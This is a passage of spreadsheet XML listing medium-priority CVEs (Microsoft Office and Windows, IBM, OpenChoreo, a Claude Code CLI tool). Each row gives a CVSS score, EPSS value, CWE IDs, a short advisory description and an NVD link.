      <c r="G348" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H34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48" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J348" s="5" t="inlineStr"/>
      <c r="K348" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L348" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73016</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73023</t>
        </is>
      </c>
      <c r="C349" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E349" s="5" t="inlineStr"/>
      <c r="F349" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G349" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H349" s="5" t="inlineStr"/>
      <c r="I349" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J349" s="5" t="inlineStr"/>
      <c r="K349" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L349" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73023</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73222</t>
        </is>
      </c>
      <c r="C350" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E350" s="5" t="inlineStr"/>
      <c r="F350" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G350" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H350" s="5" t="inlineStr"/>
      <c r="I350" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J350" s="5" t="inlineStr"/>
      <c r="K350" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-352, CWE-78</t>
        </is>
      </c>
      <c r="L350" s="5" t="inlineStr">
        <is>
          <t>Claude Code Templates is a CLI tool for configuring and monitoring Claude Code. Prior to 1.29.4, the Claude Code Studio server launched by the --studio option in cli-tool/src/sandbox-server.js binds to all interfaces on port 3444, permits cross-origin requests, and requires no authentication. The POST /api/execute endpoint passes the prompt request-body field to executeLocalTask(), and POST /api/install-agent passes the agentName request-body field to a child process. The same unsafe agent field path is reachable from /api/execute through checkAndInstallAgent(). These attacker-controlled values reach child_process.spawn() with shell execution enabled, causing Node.js to construct a shell command in which metacharacters are interpreted. An attacker who can reach the port directly, or who convinces a developer running Studio to visit a malicious website, can execute arbitrary operating-system commands with the developer's privileges and compromise source code, credentials, and local data. This issue is fixed in version 1.29.4.</t>
        </is>
      </c>
      <c r="M350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73222</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73667</t>
        </is>
      </c>
      <c r="C351" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E351" s="5" t="inlineStr"/>
      <c r="F351" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G351" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H351" s="5" t="inlineStr"/>
      <c r="I351" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L351" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a complete, open-source developer platform for Kubernetes. Prior to 1.0.4, 1.1.4, and 1.2.0-rc.2, OpenChoreo Workflow Plane templates under samples/getting-started/workflow-templates/ interpolated developer-controlled workflow parameters into shell program text executed through sh -c instead of passing the values through container.env, allowing arbitrary commands to run in workflow pods while affected privileged Podman templates lacked hostUsers: false. This issue is fixed in versions 1.0.4, 1.1.4, and 1.2.0-rc.2.</t>
        </is>
      </c>
      <c r="M351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73667</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73841</t>
        </is>
      </c>
      <c r="C352" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E352" s="5" t="inlineStr"/>
      <c r="F352" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G352" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H352" s="5" t="inlineStr"/>
      <c r="I352" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="L352" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a complete, open-source developer platform for Kubernetes. Prior to 1.1.6 and 1.2.3, internal/openchoreo-api/api/handlers/exec.go and internal/openchoreo-api/api/handlers/wirelogs.go authorize component:exec and wirelogs:view using the caller-supplied project query parameter instead of comp.Spec.Owner.ProjectName, allowing a user with a project-scoped grant to execute commands in and read wirelogs from components owned by other projects in the same namespace. This vulnerability is fixed in 1.1.6 and 1.2.3.</t>
        </is>
      </c>
      <c r="M352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73841</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75624</t>
        </is>
      </c>
      <c r="C353" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E353" s="5" t="inlineStr"/>
      <c r="F353" s="5" t="inlineStr"/>
      <c r="G353" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H353" s="5" t="inlineStr"/>
      <c r="I353" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J353" s="5" t="inlineStr"/>
      <c r="K353" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L353" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.27 could allow a remote authenticated attacker to bypass security restrictions due to incorrect authorization.</t>
        </is>
      </c>
      <c r="M353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75624</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75777</t>
        </is>
      </c>
      <c r="C354" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E354" s="5" t="inlineStr"/>
      <c r="F354" s="5" t="inlineStr"/>
      <c r="G354" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H354" s="5" t="inlineStr"/>
      <c r="I354" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J354" s="5" t="inlineStr"/>
      <c r="K354" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L354" s="5" t="inlineStr">
        <is>
          <t>IBM Aspera Enterprise WebApps 1.0.0 through 1.0.5 could allow a local attacker to escape container protections due to unrestricted system calls being permitted within the container.</t>
        </is>
      </c>
      <c r="M354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75777</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76059</t>
        </is>
      </c>
      <c r="C355" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E355" s="5" t="inlineStr"/>
      <c r="F355" s="5" t="inlineStr"/>
      <c r="G355" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H355" s="5" t="inlineStr"/>
      <c r="I355" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J355" s="5" t="inlineStr"/>
      <c r="K355" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L355"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M355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76059</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77495</t>
        </is>
      </c>
      <c r="C356" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E356" s="5" t="inlineStr"/>
      <c r="F356" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G356" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H356" s="5" t="inlineStr"/>
      <c r="I356" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J356" s="5" t="inlineStr"/>
      <c r="K356" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L356" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77504</t>
        </is>
      </c>
      <c r="C357" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E357" s="5" t="inlineStr"/>
      <c r="F357" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G357" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H357" s="5" t="inlineStr"/>
      <c r="I357" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J357" s="5" t="inlineStr"/>
      <c r="K357" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L357" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77504</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77901</t>
        </is>
      </c>
      <c r="C358" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E358" s="5" t="inlineStr"/>
      <c r="F358" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G358" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H358" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I358" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L358" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77901</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77907</t>
        </is>
      </c>
      <c r="C359" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E359" s="5" t="inlineStr"/>
      <c r="F359" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G359" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H359" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_2026</t>
        </is>
      </c>
      <c r="I359" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J359" s="5" t="inlineStr"/>
      <c r="K359" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L359" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77907</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77908</t>
        </is>
      </c>
      <c r="C360" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E360" s="5" t="inlineStr"/>
      <c r="F360" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G360" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H360" s="5" t="inlineStr"/>
      <c r="I360" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L360" s="5" t="inlineStr">
        <is>
          <t>Improper control of generation of code ('code injection') in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77908</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78439</t>
        </is>
      </c>
      <c r="C361" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E361" s="5" t="inlineStr"/>
      <c r="F361" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G361" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H361" s="5" t="inlineStr"/>
      <c r="I361" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J361" s="5" t="inlineStr"/>
      <c r="K361" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L361" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78439</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78442</t>
        </is>
      </c>
      <c r="C362" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E362" s="5" t="inlineStr"/>
      <c r="F362" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G362" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H362" s="5" t="inlineStr"/>
      <c r="I362" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J362" s="5" t="inlineStr"/>
      <c r="K362" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L362" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows OLE DB allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78442</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78504</t>
        </is>
      </c>
      <c r="C363" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E363" s="5" t="inlineStr"/>
      <c r="F363" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G363" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H363" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I363" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J363" s="5" t="inlineStr"/>
      <c r="K363" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L363" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78504</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78505</t>
        </is>
      </c>
      <c r="C364" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E364" s="5" t="inlineStr"/>
      <c r="F364" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G364" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H364" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I364" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J364" s="5" t="inlineStr"/>
      <c r="K364" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L364" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78505</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78507</t>
        </is>
      </c>
      <c r="C365" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E365" s="5" t="inlineStr"/>
      <c r="F365" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G365" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H365" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I365" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L365" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78507</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78511</t>
        </is>
      </c>
      <c r="C366" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E366" s="5" t="inlineStr"/>
      <c r="F366" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G366" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H366" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I366" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L366" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78511</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78512</t>
        </is>
      </c>
      <c r="C367" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E367" s="5" t="inlineStr"/>
      <c r="F367" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G367" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H367" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I367" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J367" s="5" t="inlineStr"/>
      <c r="K367" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L367" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78512</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78514</t>
        </is>
      </c>
      <c r="C368" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E368" s="5" t="inlineStr"/>
      <c r="F368" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G368" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H368" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I368" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J368" s="5" t="inlineStr"/>
      <c r="K368" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L368" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78514</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78517</t>
        </is>
      </c>
      <c r="C369" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E369" s="5" t="inlineStr"/>
      <c r="F369" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G369" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H369" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I369" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J369" s="5" t="inlineStr"/>
      <c r="K369" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L369" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78517</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78518</t>
        </is>
      </c>
      <c r="C370" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E370" s="5" t="inlineStr"/>
      <c r="F370" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G370" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H370" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I370" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J370" s="5" t="inlineStr"/>
      <c r="K370" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="L370" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M370" s="6" t="inlineStr">
        <is>
